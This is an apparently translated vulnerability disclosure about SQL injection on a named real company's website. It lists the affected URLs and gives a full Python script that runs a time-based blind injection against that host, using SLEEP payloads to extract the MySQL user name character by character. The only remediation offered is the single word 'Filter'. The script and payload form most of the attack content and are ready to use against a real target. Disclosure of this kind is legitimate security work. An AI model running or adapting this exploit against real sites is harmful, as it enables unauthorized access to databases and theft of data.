SQL injection vulnerability exists in multiple sites of Chengdu yichuang WWW (package submission/script)

SQL injection vulnerability exists in multiple sites of Chengdu yichuang WWW (package submission/script)

Multiple SQL Injection Vulnerabilities in Chengdu yichuang WWW Main Site

The Chengdu yichuang WWW master site has multiple SQL Injection Vulnerabilities and is submitted together! Vulnerability URL:
 

http://www.kf5.com/resources/index?id=2

 

http://www.kf5.com/resources/view/id/60/

 

http://www.kf5.com/resources/index/id/2

 

http://www.kf5.com/resources/view?id=60/

 

... Maybe there are other places...

First, an error is reported.
 

Basically, it is determined that the injection exists. However, if the server seems to have a firewall, sqlmap is useless.

First, manually obtain the length of the user as 16
 

Run the script to run the user
 

 

Script:
 

#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibimport mathheaders = {}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print 'Start to retrive MySQL User:'user= ''for i in range(1, 17):    for payload in payloads:            s = "/resources/view?id=if(now()=sysdate(),SLEEP(IF(ascii(mid(user(),%s,1))=%s,10,0)),0)" % (i, ord(payload))            conn = httplib.HTTPConnection('www.kf5.com', timeout=150)            conn.request(method='GET',                         url=s,                         headers=headers)            start_time = time.time()            conn.getresponse()            conn.close()            print '.',            if time.time() - start_time > 10.0:                user += payload                print '\n\n[in progress]', user,                breakprint '\n\n[Done] MySQL User is %s' % user

 

Solution:

Filter